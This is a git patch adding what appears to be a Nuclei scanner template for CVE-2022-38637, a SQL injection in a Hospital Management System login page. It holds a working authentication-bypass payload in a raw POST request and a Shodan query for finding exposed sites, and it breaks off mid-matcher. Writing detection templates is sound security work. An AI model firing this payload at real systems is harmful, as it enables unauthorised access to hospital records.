From 75757bbe682efee65a07cff2c86c5b4a1ea328ad Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Wed, 14 Sep 2022 18:25:38 +0530 Subject: [PATCH] Create CVE-2022-38637.yaml --- cves/2022/CVE-2022-38637.yaml | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2022/CVE-2022-38637.yaml diff --git a/cves/2022/CVE-2022-38637.yaml b/cves/2022/CVE-2022-38637.yaml new file mode 100644 index 0000000000..5abffa53c0 --- /dev/null +++ b/cves/2022/CVE-2022-38637.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-38637 + +info: + name: Hospital Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38637 + - https://nvd.nist.gov/vuln/detail/CVE-2022-38637 + metadata: + shodan-query: http.html:"Hospital Management System" + verified: "true" + tags: cve,cve2022,hms,hospital,cms,sqli,authenticated + +requests: + - raw: + - | + POST /hms/user-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit= + + skip-variables-check: true + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '